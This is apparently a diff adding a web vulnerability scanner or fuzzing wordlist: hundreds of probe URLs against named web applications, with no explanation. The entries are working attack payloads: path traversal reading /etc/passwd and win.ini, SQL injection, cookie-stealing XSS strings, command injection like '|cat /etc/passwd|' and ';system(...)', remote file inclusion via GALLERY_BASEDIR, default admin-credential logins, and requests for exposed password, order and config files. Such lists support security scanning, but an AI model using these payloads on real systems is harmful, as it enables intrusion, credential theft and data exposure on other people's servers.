+%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+%00
+ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini
+ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd
+ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini
+admentor/adminadmin.asp
+POSTNUKEMy_eGallery/public/displayCategory.php
+cgi-bin/classifieds/index.cgi
+imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x
+userinfo.php?uid=1;
+site/'
+postnuke/index.php?module=My_eGallery
+postnuke/html/index.php?module=My_eGallery
+cgi-bin/alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
+phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=
+phpBB2/search.php?search_id=1\
+index.php?module=My_eGallery
+author.asp
+horde/test.php
+examples/cookie
+examples/session
+themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>
+index.php?option=search&searchword=<script>alert(document.cookie);</script>
+emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script>
+emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</script>
+emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script>
+administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script>
+administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script>
+administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script>
+administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script>
+administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script>
+administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script>
+index.php?dir=<script>alert('Vulnerable')</script>
+https-admserv/bin/index?/<script>alert(document.cookie)</script>
+clusterframe.jsp?cluster=<script>alert(document.cookie)</script>
+article.cfm?id=1'<script>alert(document.cookie);</script>
+upload.php?type=\"<script>alert(document.cookie)</script>
+soinfo.php?\"><script>alert('Vulnerable')</script>
+modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>;
+modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
+modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+>
+webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef
+addyoursite.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
+666%0a%0a<script>alert('Vulnerable');</script>666.jsp
+servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>
+servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>
+servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>
+servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>
+servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>
+servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>
+<script>alert('Vulnerable')</script>.shtm
+<script>alert('Vulnerable')</script>.stm
+admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&Retur
+SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script>
+_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script>
+nosuchurl/><script>alert('Vulnerable')</script>
+test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
+test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
+cgi-bin/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E
+search/results.stm?query=&lt;script&gt;alert('vulnerable');&lt;/script&gt;
+webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>
+cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>
+cgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>
+cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;
+cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>
+cgi-bin/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
+cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>
+cgi-bin/start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
+cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>
+cgi-bin/search.php?searchstring=<script>alert(document.cookie)</script>
+cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
+cgi-bin/myguestbook.cgi?action=view
+cgi-bin/login.pl?course_id=\">&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;
+cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E
+cgi-bin/FormMail.cgi?<script>alert(\"Vulnerable\");</script>
+cgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable
+cgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script>
+cgi-bin/erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
+cgi-bin/diagnose.cgi
+cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>
+cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>
+cgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;
+cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=
+cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
+cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>
+cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>
+~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null
+~/<script>alert('Vulnerable')</script>.aspx
+~/<script>alert('Vulnerable')</script>.asp
+z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825&
+catinfo?<u><b>TESTING
+webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
+webamil/test.php
+users.php?mode=profile&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
+usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)
+user.php?op=userinfo&uname=<script>alert('hi');</script>
+user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com
+TopSitesdirectory/help.php?sid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
+templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>
+supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
+supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
+supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
+sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script>
+submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview
+ss000007.pl?PRODREF=<script>alert('Vulnerable')</script>
+showcat.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
+shop/normal_html.cgi?file=&lt;script&gt;alert(\"Vulnerable\")&lt;/script&gt;
+setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P
+servlet/custMsg?guestName=<script>alert(\"Vulnerable\")</script>
+servlet/CookieExample?cookiename=<script>alert(\"Vulnerable\")</script>
+servlet/ContentServer?pagename=<script>alert('Vulnerable')</script>
+search/index.cfm?<script>alert(\"Vulnerable\")</script>
+search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script>
+search.php?zoom_query=<script>alert(\"hello\")</script>
+search.php?searchstring=<script>alert(document.cookie)</script>
+search.php?searchfor=\"><script>alert('Vulnerable');</script>
+search.asp?term=<%00script>alert('Vulnerable')</script>
+script>alert('Vulnerable')</script>.cfm
+samples/search.dll?query=<script>alert(document.cookie)</script>
+replymsg.php?send=1&destin=<script>alert('Vulnerable')</script>
+profiles.php?uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
+postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft
+postnuke/html/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
+pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1
+pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello
+pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit
+phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</script>
+phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X]
+phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"><script>alert('Vulnerable')</script>
+phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"><script>alert('Vulnerable')</script>
+phpwebchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
+phptonuke.php?filnavn=<script>alert('Vulnerable')</script>
+phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E
+phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>
+phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script>
+phpimageview.php?pic=javascript:alert('Vulnerable')
+phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script>
+phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>
+phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script>
+phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>
+phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>
+pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1
+pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
+Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script>
+openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>
+openautoclassifieds/friendmail.php?listing=&lt;script&gt;alert(document.domain);&lt;/script&gt;
+node/view/666\"><script>alert(document.domain)</script>
+netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>
+nav/cList.php?root=</script><script>alert('Vulnerable')/<script>
+myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=
+myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent
+myhome.php?action=messages&box=<script>alert('Vulnerable')</script>
+msadm/user/login.php3?account_name=\"><script>alert('Vulnerable')</script>
+msadm/site/index.php3?authid=\"><script>alert('Vulnerable')</script>
+msadm/domain/index.php3?account_name=\"><script>alert('Vulnerable')</script>
+modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>
+modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script>
+modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script>
+modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script>
+modules/Forums/bb_smilies.php?bgcolor1=\"><script>alert('Vulnerable')</script>
+modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script>
+modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2
+modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script>
+modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script>
+modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script>
+modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script>
+modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script>
+modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0
+modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script>
+modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|
+modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>
+modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script>
+modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script>
+modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test
+modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script>
+modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script>
+modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script>
+modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index
+members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22
+megabook/admin.cgi?login=<script>alert('Vulnerable')</script>
+mailman/options/yourlist?language=en&email=&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;
+mailman/listinfo/<script>alert('Vulnerable')</script>
+ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\"Vulnerable\")</script>
+launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script>
+launch.asp?NFuse_Application=<script>alert('Vulnerable')</script>
+jigsaw/
+isapi/testisa.dll?check1=<script>alert(document.cookie)</script>
+index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
+index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>
+index.php?catid=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
+index.php?action=storenew&username=<script>alert('Vulnerable')</script>
+index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script
+index.php/\"><script><script>alert(document.cookie)</script><
+index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>
+index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchBu
+include.php?path=contact.php&contact_email=\">&lt;script&gt;alert(document.cookie);&lt;/script&gt;
+html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
+html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
+html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>
+guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E
+gallery/search.php?searchstring=<script>alert(document.cookie)</script>
+friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script>
+forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22
+forums/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
+forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script>
+forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert('Vulnerable');</script>
+esp?PAGE=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
+error/500error.jsp?et=1<script>alert('Vulnerable')</script>;
+downloads/pafiledb.php?action=rate&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
+downloads/pafiledb.php?action=email&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
+downloads/pafiledb.php?action=download&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
+download.php?sortby=&dcategory=<script>alert('Vulnerable')</script>
+default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
+default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
+comments/browse.php?fid=2&tid=4&go=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
+comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview
+cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>
+cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\"><
+chat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
+cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>
+cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>
+cgi-bin/test2.pl?&lt;script&gt;alert('Vulnerable');&lt;/script&gt;
+cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E
+calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05
+ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script>
+ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f
+bb000001.pl<script>alert('Vulnerable')</script>
+article.php?sid=\"><Img
+apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>
+anthill/login.php
+admin/login.php?path=\"></form><form
+addressbook/index.php?surname=<script>alert('Vulnerable')</script>
+addressbook/index.php?name=<script>alert('Vulnerable')</script>
+add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>
+a?<script>alert('Vulnerable')</script>
+a.jsp/<script>alert('Vulnerable')</script>
+?mod=<script>alert(document.cookie)</script>&op=browse
+<script>alert('Vulnerable')</script>.thtml
+<script>alert('Vulnerable')</script>.shtml
+<script>alert('Vulnerable')</script>.jsp
+<script>alert('Vulnerable')</script>.aspx
+/profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
+/comment.php?mode=Delete&sid=1&cid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
+&lt;script&gt;alert('Vulnerable');&lt;/script&gt;
+%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
+%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
+%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
+%22%3cscript%3ealert(%22xss%22)%3c/script%3e
+%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
+cgi-bin/title.cgi
+cgi-bin/compatible.cgi
+add_user.php
+cgi-bin/probecontrol.cgi?command=enable&username=cancer&password=killer
+cgi-bin/retrieve_password.pl
+cgi-bin/wwwadmin.pl
+cfdocs/expeval/displayopenedfile.cfm
+cfdocs/expeval/sendmail.cfm
+cgi-bin/bigconf.cgi
+cgi-bin/webmap.cgi
+cgi-bin/wwwwais
+ammerum/
+ariadne/
+cbms/cbmsfoot.php
+cbms/changepass.php
+cbms/editclient.php
+cbms/passgen.php
+cbms/realinv.php
+cbms/usersetup.php
+cgi-bin/admin/admin.cgi
+cgi-bin/admin/setup.cgi
+cgi-bin/mt-static/mt-load.cgi
+cgi-bin/mt-static/mt.cfg
+cgi-bin/mt/mt-load.cgi
+cgi-bin/mt/mt.cfg
+cgi-bin-sdb/printenv
+ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C
+db/users.dat
+cgi-bin/cgiwrap/~@USERS
+cgi-bin/cgiwrap/~JUNK(5)
+cgi-bin/cgiwrap/~root
+cgi-bin/dbman/db.cgi?db=no-db
+cgi-bin/dcshop/auth_data/auth_user_file.txt
+cgi-bin/DCShop/auth_data/auth_user_file.txt
+cgi-bin/dcshop/orders/orders.txt
+cgi-bin/DCShop/orders/orders.txt
+cgi-bin/dumpenv.pl
+cgi-bin/htsearch?-c/nonexistant
+cgi-bin/mkilog.exe
+cgi-bin/mkplog.exe
+cgi-bin/orders/orders.txt
+cgi-bin/processit.pl
+cgi-bin/rpm_query
+cgi-bin/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
+cgi-bin/shop/auth_data/auth_user_file.txt
+cgi-bin/shop/orders/orders.txt
+cgi-bin/ws_ftp.ini
+cgi-bin/WS_FTP.ini
+?sql_debug=1
+a_security.htm
+Admin_files/order.log
+admin.html
+admin/cplogfile.log
+admin/system_footer.php
+cfdocs/snippets/fileexists.cfm
+cgi-bin/MachineInfo
+chat/!nicks.txt
+chat/!pwds.txt
+chat/data/usr
+com
+COM
+config.php
+config/
+cplogfile.log
+cutenews/index.php?debug
+examples/jsp/snp/anything.snp
+file-that-is-not-real-2002.php3
+index.php?sql_debug=1
+cgi-bin/view-source?view-source
+cgi-bin/webplus?about
+cfdocs/snippets/viewexample.cfm
+chassis/config/GeneralChassisConfig.html
+cgi-bin/ibill.pm
+cgi-bin/scoadminreg.cgi
+cgi-bin/SGB_DIR/superguestconfig
+hp/device/this.LCDispatcher
+cfdocs/snippets/evaluate.cfm
+cfide/Administrator/startstop.html
+cgi-bin/icat
+cgi-bin/MsmMask.exe?mask=/junk334
+cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
+cgi-bin/query?mss=%2e%2e/config
+cgi-bin/test-cgi?/*
+cgi-bin/update.dpgs
+cgi-bin/view-source
+Mem/dynaform/FileExplorer.htm
+cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
+cgi-bin/lastlines.cgi?process
+cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd|
+cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
+cgi-bin/campas?%0acat%0a/etc/passwd%0a
+cgi-bin/cgicso?query=AAA
+cgi-bin/cgiwrap
+cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
+cgi-bin/Count.cgi
+cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
+cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
+cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
+cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
+cgi-bin/echo.bat
+cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
+cgi-bin/ImageFolio/admin/admin.cgi
+cgi-bin/info2www
+cgi-bin/infosrch.cgi
+cgi-bin/listrec.pl
+cgi-bin/mailnews.cgi
+cgi-bin/mmstdod.cgi
+cgi-bin/pagelog.cgi
+cgi-bin/perl?-v
+cgi-bin/perl.exe?-v
+cgi-bin/perl.exe
+cgi-bin/perl
+cgi-bin/plusmail
+cgi-bin/scripts/slxweb.dll/getfile?type=Library&file=[invalid
+cgi-bin/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
+cgi-bin/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
+cgi-bin/spin_client.cgi?aaaaaaaa
+cgi-bin/sscd_suncourier.pl
+cgi-bin/viralator.cgi
+cgi-bin/virgil.cgi
+cgi-bin/vpasswd.cgi
+cgi-bin/webgais
+cgi-bin/websendmail
+cgi-bin/whois.cgi?action=load&whois=%3Bid
+cd-cgi/sscd_suncourier.pl
+cgi-bin/common/listrec.pl
+cgi-bin/handler
+cgi-bin/handler/netsonar;cat
+cgi-bin/webdist.cgi
+DB4Web/10.10.10.10:100
+ews/ews/architext_query.pl
+exec/show/config/cr
+instantwebmail/message.php
+cfdocs/snippets/gettempdirectory.cfm
+cgi-bin/stat.pl
+cgi-bin/cachemgr.cgi
+cgi-bin/ppdscgi.exe
+cgi-bin/sws/admin.html
+cgi-bin/webif.cgi
+admin.php?en_log_id=0&action=config
+admin.php?en_log_id=0&action=users
+admin.php4?reg_login=1
+admin/admin_phpinfo.php4
+admin/login.php?action=insert&username=test&password=test
+cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
+interscan/cgi-bin/FtpSave.dll?I'm%20Here
+ext.ini.%00.txt
+cgi-bin/webdriver
+dostuff.php?action=modify_user
+cgi-bin/c32web.exe/ChangeAdminPassword
+accounts/getuserdesc.asp
+cgi-bin/cgi-lib.pl
+cgi-bin/log/nether-log.pl?checkit
+cgi-bin/mini_logger.cgi
+cgi-bin/mt-static/
+cgi-bin/mt/
+cgi-bin/nimages.php
+cgi-bin/robadmin.cgi
+Admin/
+cgi-bin/netpad.cgi
+cgi-bin/troops.cgi
+cgi-bin/unlg1.1
+cgi-bin/unlg1.2
+cgi-bin/rwwwshell.pl
+cgi-bin/photo/manage.cgi
+cgi-bin/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
+achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
+agentadmin.php
+b2-include/b2edit.showposts.php
+catalog/includes/include_once.php
+errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
+sqldump.sql
+structure.sql
+servlet/SessionManager
+php.ini
+SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
+ip.txt
+JUNK(6).cfm?mode=debug
+level/42/exec/show%20conf
+livehelp/
+LiveHelp/
+logicworks.ini
+login.jsp
+logins.html
+logs/str_err.log
+mall_log_files/order.log
+mambo/administrator/phpinfo.php
+megabook/files/20/setup.db
+modules.php?name=Members_List&letter='%20OR%20pass%20LIKE%20'a%25'/*
+modules.php?name=Members_List&sql_debug=1
+myinvoicer/config.inc
+officescan/hotdownload/ofscan.ini
+order/order_log_v12.dat
+order/order_log.dat
+orders/order_log_v12.dat
+Orders/order_log_v12.dat
+orders/order_log.dat
+Orders/order_log.dat
+PDG_Cart/shopper.conf
+phorum/admin/stats.php
+php-coolfile/action.php?action=edit&file=config.php
+phpBB/phpinfo.php
+phpinfo.php
+phpinfo.php3
+pmlite.php
+session/admnlogin
+settings/site.ini
+SiteScope/htdocs/SiteScope.html
+soapdocs/ReleaseNotes.html
+ssdefs/siteseed.dtd
+servlet/allaire.jrun.ssi.SSIFilter
+pp.php?action=login
+isapi/count.pl?
+krysalis/
+logjam/showhits.php
+manual.php
+mods/apage/apage.cgi?f=file.htm.|id|
+modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
+nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
+perl/-e%20%22system('cat%20/etc/passwd');\%22
+phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
+phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
+Program%20Files/
+smssend.php
+pls/simpledad/admin_/dadentries.htm
+Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000
+ncl_items.html
+ncl_items.shtml?SUBJECT=1
+photo/manage.cgi
+photodata/manage.cgi
+pub/english.cgi?op=rmail
+pvote/ch_info.php?newpass=password&confirm=password%20
+scripts/wsisa.dll/WService=anything?WSMadmin
+SetSecurity.shm
+submit?setoption=q&option=allowed_ips&value=255.255.255.255
+thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin
+servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22a
+shopadmin.asp
+modsecurity.php
+phpBB2/includes/db.php
+<script>alert('Vulnerable')</script>
+_vti_bin/shtml.exe/junk_nonexistant.exe
+_vti_txt/_vti_cnf/
+_vti_txt/
+_vti_pvt/deptodoc.btr
+_vti_pvt/doctodep.btr
+_vti_pvt/services.org
+_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
+_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
+_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude
+_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude
+_vti_bin/_vti_aut/dvwssr.dll
